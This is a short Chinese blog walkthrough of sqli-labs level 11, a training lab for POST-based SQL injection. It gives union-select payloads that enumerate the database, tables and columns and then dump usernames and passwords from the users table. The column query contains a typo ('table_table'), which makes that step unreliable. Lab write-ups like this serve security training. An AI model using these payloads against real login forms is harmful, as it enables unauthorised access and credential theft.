sqli-labs(less-11) - 码农知识堂 - 文章详情页

sqli-labs(less-11)

sqli-labs专栏地址

目录

less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

4.查表名

5.查段名

6.查数据

7.用查到的数据Dumb登录

less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

aadmin' union select user(),database()--

4.查表名

aadmin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--

5.查段名

aadmin' union select 1,group_concat(column_name) from information_schema.columns where table_table='users'--

6.查数据

aadmin' union select 1,group_concat(username,':',password) from users --

7.用查到的数据Dumb登录
相关阅读:
[Elastic-Job2.1.5源码]-12-调度作业的服务器IP和进程信息的持久化是如何设计的?
leetcode mysql 184. 部门工资最高的员工
 云端极简部署Svelte3聊天室
 漏洞复现--鸿运主动安全监控云平台任意文件下载
 Python学习基础笔记七十二——IDE集成开发环境
 9月考，如何选择靠谱正规的培训机构？
【HTML期末学生大作业】制作一个简单HTML宠物网页（HTML+CSS）
云IDE开发环境和使用体验
 使用ssh上传数据到阿里云ESC云服务上
 开发测试运维哪个好？分别有什么特点？
原文地址：https://blog.csdn.net/lyshark_lyshark/article/details/126799211